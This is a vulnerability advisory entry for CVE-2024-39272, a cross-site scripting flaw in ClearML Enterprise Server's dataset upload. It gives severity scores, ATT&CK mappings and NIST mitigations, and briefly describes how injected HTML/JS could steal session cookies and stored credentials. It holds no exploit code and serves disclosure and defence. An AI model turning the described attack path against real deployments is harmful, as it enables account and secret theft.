CVE-2024-39272
Published: 06 February 2025
Summary
CVE-2024-39272 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Clear Clearml Enterprise Server. Its CVSS base score is 9.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Drive-by Compromise (T1189); ranked in the top 29.1% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2024-39272 is a cross-site scripting (XSS) vulnerability in the dataset upload functionality of ClearML Enterprise Server version 3.22.5-1533. The flaw allows a specially crafted HTTP request to execute arbitrary HTML code, triggered by sending a series of HTTP requests to the affected component.
An attacker with low privileges (PR:L) can exploit this vulnerability over the network (AV:N) with low complexity (AC:L), though it requires user interaction (UI:R). Successful exploitation changes scope (S:C) and results in high impacts on confidentiality, integrity, and availability (C:H/I:H/A:H), enabling the execution of arbitrary HTML code in the context of the application.
The primary advisory is detailed in the Talos Intelligence vulnerability report TALOS-2024-2110, available at https://talosintelligence.com/vulnerability_reports/TALOS-2024-2110.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-53884
Vulnerability details
A cross-site scripting (xss) vulnerability exists in the dataset upload functionality of ClearML Enterprise Server 3.22.5-1533. A specially crafted HTTP request can lead to an arbitrary html code. An attacker can send a series of HTTP requests to trigger this…
more
vulnerability.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
XSS vulnerability in dataset upload allows low-privileged attackers to inject malicious HTML/JS, which executes in victims' browsers when viewing datasets, enabling drive-by compromise via malicious content on legitimate server (T1189), exploitation of public-facing web application (T1190), and theft of session cookies or localStorage credentials like cloud storage secrets (T1539, T1555.003).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Validates and sanitizes specially crafted HTTP requests to the dataset upload functionality, preventing injection of arbitrary HTML code that triggers XSS.
Filters outputs from the dataset upload feature to encode or block arbitrary HTML/JS, stopping XSS execution in users' browsers.
Identifies, reports, and corrects the specific XSS flaw in ClearML Enterprise Server 3.22.5-1533 dataset upload, eliminating the vulnerability through remediation.